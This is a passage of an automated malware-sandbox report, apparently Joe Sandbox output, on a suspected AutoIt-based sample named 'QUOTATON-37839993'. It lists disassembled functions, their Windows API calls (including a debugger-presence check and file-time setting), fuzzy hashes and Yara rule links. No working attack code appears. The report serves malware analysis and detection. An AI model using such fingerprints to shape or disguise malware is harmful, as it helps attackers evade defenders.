                                                                        • Part of subcall function 00E0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E04160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00E04524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E04533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E3D4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: 80df52df5efb21d101ae41072209445c37f65a3fc97941a76b829dc933bf3ae3
                                                                      • Instruction ID: c524384499022d21cb623d663858601d3e36bb498aa622e26fddbcc50ac979b2
                                                                      • Opcode Fuzzy Hash: 80df52df5efb21d101ae41072209445c37f65a3fc97941a76b829dc933bf3ae3
                                                                      • Instruction Fuzzy Hash: 1721F8B1508794AFE7328B649C49BE6BFEC9B01318F04109EE79E761C1C37529C8C741
                                                                      Function 00E04C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: AU3!P/$EA06
                                                                      • API String ID: 4104443479-182974850
                                                                      • Opcode ID: a643fbc45271cb6859e73aaa89eb3fe1f4bc66027cd79ad542f9da52f2d5c33b
                                                                      • Instruction ID: fd417be1d21b28735132d1adb3827b56b50e769399a31e7b53cd36fa3e5a4a67
                                                                      • Opcode Fuzzy Hash: a643fbc45271cb6859e73aaa89eb3fe1f4bc66027cd79ad542f9da52f2d5c33b
                                                                      • Instruction Fuzzy Hash: 8941ACE2A0425867DF219B54DE917FE7FE29B55304F287065EE82BB2C2D6309DC183A1
                                                                      Function 00E07285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E3EA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00E3EA83
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E207B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
                                                                      • Instruction ID: 58f02a45807fb9168d74228da403860e293de08d604c2da9758265f674d033a8
                                                                      • Opcode Fuzzy Hash: ad1764d12f15c23ce41541836b4adfe9314c5506a8a8e2076ff4882aa019d1a6
                                                                      • Instruction Fuzzy Hash: 4921C071A00258ABCB01DF94D846BEE7BFDAF48314F00505AE548BB381DBB46989CFA1
                                                                      Function 00E1092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • _wcscat.LIBCMT ref: 00E44CB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                      • String ID: S
                                                                      • API String ID: 257928180-3334745618
                                                                      • Opcode ID: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
                                                                      • Instruction ID: b1269147658852f33123590b2f2a58bbbc45f0ec07efe9ac501c101890c0e4ce
                                                                      • Opcode Fuzzy Hash: 8a711e24c1eaa78e0a5b564b33c762b6d56ee3176d63c86e2204631b19cfdd0b
                                                                      • Instruction Fuzzy Hash: 9411A531A05208AACB40FB64CD46FDDB7E8AF88350B0064A5B988F7185EAB0A7C44B11
                                                                      Function 00E698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00E698F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E6990F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                                                                      • Instruction ID: a059de75ae4bb9bcac9f0b60529d6bbb394e36f6dcf4ce6d92c7bcbc7bd15350
                                                                      • Opcode Fuzzy Hash: 09da2eb50d0e9105658d5c2137aaae6e571eeca903e3cb40cecc006d4abbc98a
                                                                      • Instruction Fuzzy Hash: 85D05E7954030DAFDB509BA0DC0EFDA773CE704701F4002B1FB98E11A1EAB095988B91
                                                                      Function 00E7CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
                                                                      • Instruction ID: 3150a5d71c427d41e779deeb5f71a24d7a4518af8e997c366895249a3f1a3839
                                                                      • Opcode Fuzzy Hash: 9b08f513d11716b9fd0496f679580f25e159afd1e5cb8a1e7b8e049db0c0768a
                                                                      • Instruction Fuzzy Hash: 86F13C716083019FC714DF28C484A6ABBE9FF88314F54992EF999AB352D730E945CF82
                                                                      Function 00E0434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E04370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E04415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E04432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: dda5891d275d1fe81db3a7c1e97e39a1cfe8c30364d8b2ec8883af30b6b66c41
                                                                      • Instruction ID: 4e3c89285ce63a9db1651f287fef464d4a9b4149f38347da2e2dbda73074aa4e
                                                                      • Opcode Fuzzy Hash: dda5891d275d1fe81db3a7c1e97e39a1cfe8c30364d8b2ec8883af30b6b66c41
                                                                      • Instruction Fuzzy Hash: 0231A0F15047018FD725DF64D984A9BBBF8FB58308F00192EF69AA22D1D771A988CB52
                                                                      Function 00E2571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A192
                                                                        • Part of subcall function 00E2A16B: __NMSG_WRITE.LIBCMT ref: 00E2A19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2A1C8: GetModuleFileNameW.KERNEL32(00000000,00EC33BA,00000104,?,00000001,00000000), ref: 00E2A25A
                                                                        • Part of subcall function 00E2A1C8: ___crtMessageBoxW.LIBCMT ref: 00E2A308
                                                                        • Part of subcall function 00E2309F: ___crtCorExitProcess.LIBCMT ref: 00E230A5
                                                                        • Part of subcall function 00E2309F: ExitProcess.KERNEL32 ref: 00E230AE
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      • RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
                                                                      • Instruction ID: 11e0b9146feb3e64d26a0387b046f1b71068b7b4a0c2f84f3d6452f4418714b7
                                                                      • Opcode Fuzzy Hash: 1133c3faae225f3ec4945bf15f0d77a595dbf84ca4bbc33f5f960ddb1ca6ef71
                                                                      • Instruction Fuzzy Hash: 9701F576281B31DFDA142735FD42A6E73C89B82765F10243BF415BB191DE708D014661
                                                                      Function 00E698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E69548,?,?,?,?,?,00000004), ref: 00E698BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E698D1
                                                                      • CloseHandle.KERNEL32(00000000,?,00E69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E698D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                                                                      • Instruction ID: 60ea3d3ae715815977b3eb90ae76b010cf1336d7a5fffcfe4ee84fabd8397438
                                                                      • Opcode Fuzzy Hash: 54cb1ef6ab6179dc1c144db6f41a79baa7e0e09936e52afaa9ff8f2222440ec9
                                                                      • Instruction Fuzzy Hash: B9E08632181214BBD7212B95EC0DFDA7B19EB06765F104220FB58B90E1C7B115259798
                                                                      Function 00E68D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00E68D1B
                                                                        • Part of subcall function 00E22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29A24), ref: 00E22D69
                                                                        • Part of subcall function 00E22D55: GetLastError.KERNEL32(00000000,?,00E29A24), ref: 00E22D7B
                                                                      • _free.LIBCMT ref: 00E68D2C
                                                                      • _free.LIBCMT ref: 00E68D3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction ID: 542b0550c191539f8a61446e5a71269a78d3e3c8d36fb4fa1a4246417f162705
                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction Fuzzy Hash: 08E012B164161157CB24A578BA40A9313DC4F5C3967142A1DB60DF7186CE64F8528174
                                                                      Function 00E0A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: b596676b8ed4fe7d0a5c75d586a0e7af28534b96e109a4bd2e9f23cd0fda861b
                                                                      • Instruction ID: 717fb4d913ca38f737c0ac8f35f7f1734d71b72226701fe50060c075555472a5
                                                                      • Opcode Fuzzy Hash: b596676b8ed4fe7d0a5c75d586a0e7af28534b96e109a4bd2e9f23cd0fda861b
                                                                      • Instruction Fuzzy Hash: 0C224D70508305DFD724DF14C494A6AB7E1FF84304F19A96DE89AAB3A2D731ED85CB82
                                                                      Function 00E07A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
                                                                      • Instruction ID: 018b031efee465604020dfa27e95b6b64f3157bb5fc62034c7e23c4e031d2caf
                                                                      • Opcode Fuzzy Hash: 5de438b4bbeb6ea6bf5d4d191a06a7a70a83262c81ab0dc82e7a250ab2e3169d
                                                                      • Instruction Fuzzy Hash: 7F31B3B1B04606AFC704DF68D8D1E69B3A9FF483207159629E459DB2D1EB30F9A0CB90
                                                                      Function 00E047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00E04834
                                                                        • Part of subcall function 00E2336C: __lock.LIBCMT ref: 00E23372
                                                                        • Part of subcall function 00E2336C: DecodePointer.KERNEL32(00000001,?,00E04849,00E57C74), ref: 00E2337E
                                                                        • Part of subcall function 00E2336C: EncodePointer.KERNEL32(?,?,00E04849,00E57C74), ref: 00E23389
                                                                        • Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E04915
                                                                        • Part of subcall function 00E048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E0492A
                                                                        • Part of subcall function 00E03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
                                                                        • Part of subcall function 00E03B3A: IsDebuggerPresent.KERNEL32 ref: 00E03B7A
                                                                        • Part of subcall function 00E03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB
                                                                        • Part of subcall function 00E03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E04874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
                                                                      • Instruction ID: dfbb67a752d487f3ddb36be0d3f799224b9c3207b8674d1ba745a96602acc3d1
                                                                      • Opcode Fuzzy Hash: 84b2b1101b2b204c81a13f172cef4278fdf8bf9f96d1cb439546b65fd87cfd54
                                                                      • Instruction Fuzzy Hash: CD1181B19043019FC704DF2AE80590EFBE8FB94750F10892EF454A32B2DB719589CB91
                                                                      Function 00E20DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      • std::exception::exception.LIBCMT ref: 00E20DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                        • Part of subcall function 00E2859B: RaiseException.KERNEL32(?,?,?,00EB9E78,00000000,?,?,?,?,00E20E06,?,00EB9E78,?,00000001), ref: 00E285F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 3902256705-0
                                                                      • Opcode ID: adce411fa217c43688a3c4e6b53aec71d8e264d645e89a53b46671d51d77692a
                                                                      • Instruction ID: 35e876072270b94904df2444322b02080c1760002821050f70920e1a85fa7bd8
                                                                      • Opcode Fuzzy Hash: adce411fa217c43688a3c4e6b53aec71d8e264d645e89a53b46671d51d77692a
                                                                      • Instruction Fuzzy Hash: CAF0813550222967CF10BAA4FD129DEB7E8AF01315F10642AFA14B6182DF709A80D6D1
                                                                      Function 00E253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E28B28: __getptd_noexit.LIBCMT ref: 00E28B28
                                                                      • __lock_file.LIBCMT ref: 00E253EB
                                                                        • Part of subcall function 00E26C11: __lock.LIBCMT ref: 00E26C34
                                                                      • __fclose_nolock.LIBCMT ref: 00E253F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                      • String ID:
                                                                      • API String ID: 2800547568-0
                                                                      • Opcode ID: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
                                                                      • Instruction ID: 1d3ac7d2e99e8a37d04e4920b839bcb9706f822383fa588ec1d270510a4b1fe7
                                                                      • Opcode Fuzzy Hash: 9cba22f98c5c2a8b3e5cee4194f7545e8bc016c7d3ed3c6cf93d04bfb1d8896e
